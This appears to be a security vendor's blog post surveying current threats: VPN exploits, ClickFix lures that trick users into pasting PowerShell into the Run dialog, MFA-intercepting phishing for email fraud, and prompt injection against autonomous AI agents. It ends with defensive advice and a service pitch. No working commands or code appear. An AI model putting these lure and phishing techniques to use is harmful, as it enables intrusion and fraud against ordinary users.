Every day at Recon InfoSec we’re thinking about one thing: how are we giving bad guys headaches? To do that well, you have to stay close to what those bad guys are actually doing. So let me share what we're seeing in the field right now, because some of it is more creative than some people realize.
The least likely but highest impact incident is still a full network breach: attackers with code execution on your machines, lateral movement through your environment, and ultimately ransomware. It's what everybody's most scared of, and for good reason.
Lately, those breaches are starting in two main places. First, your VPN. Your VPN is not a security appliance. It's a front door. Attackers have exploited Fortigate and Cisco vulnerabilities already this year. Attackers are coming right through the front door, and multi-factor authentication on your VPN is non-negotiable at this point.
The second entry point is something called ClickFix, and it's worth understanding because it's genuinely clever. Users end up on malicious websites and find something that looks completely legitimate: a fake CAPTCHA, a Cloudflare popup, a Microsoft prompt. The page asks them to verify they're human by pressing Windows+R, pasting whatever they just copied to their clipboard, and hitting Enter. What they're pasting is PowerShell. It's code execution. We warned about this last year and it only got more sophisticated. They even started using fake Blue Screen of Death messages as the lure. Attackers have evolved the technique further, moving to Windows Terminal to bypass security tools that had gotten better at detecting the original method.
Ransomware has gotten harder to pull off. Bad guys are practical, and right now the quickest path to money runs through your cloud identity.
We’ve been seeing a lot of business email compromises through cloud account takeovers. A user enters their credentials and MFA code into a fake login page, while an attacker sitting in the middle captures everything in real time. The MFA you put in place doesn't help when someone is intercepting the whole session.
Once they're in, two things tend to happen. If the account looks useful for financial fraud, they'll sit quietly inside email conversations and swap out a legitimate invoice or wire transfer details with their own. If not, they'll use the trusted mailbox to spread the attack further.
There are real and emerging enterprise security risks coming from AI, and we're already working cases because of it.
According to some recently published research, nearly half of employees use AI tools through personal accounts outside their organization's IT oversight, creating blind spots that attackers are starting to exploit. We worked a case recently where a non-technical user was running what looked like suspicious PowerShell. It turned out they were on ChatGPT, asking it to help with something on their computer, and just running whatever commands it gave them without understanding what any of it meant.
The more dangerous end of this problem involves AI tools that require broad access to your systems and operate autonomously without human approval. Our Head of Recon Labs recently broke down exactly why this matters: when you hand broad system access to an AI agent that acts on your behalf without human review, you're exposed not only to data loss, but to prompt injection, where attackers craft inputs that trick the agent into acting against your interests. These aren't theoretical risks. We're already seeing them in real environments.
Patch your VPN and prioritize it. Enable multi-factor authentication everywhere you can, and look into solutions that go beyond standard MFA for cloud access. Train your users specifically on ClickFix style attacks, because traditional phishing awareness doesn't typically cover attacks instructing users to paste things into the Run dialog. Have a real conversation about which AI tools are approved for use in your organization, and why it matters.
When we're investigating incidents like these, tools like SIFT Workstation, Velociraptor, and Timesketch are what help us piece together exactly what happened. That visibility is often what separates a confident answer from an educated guess, especially when lawyers are asking whether data actually left the network.
We help overwhelmed IT teams stop threats like these through Managed Security Operations. If you would like to learn more, let’s talk!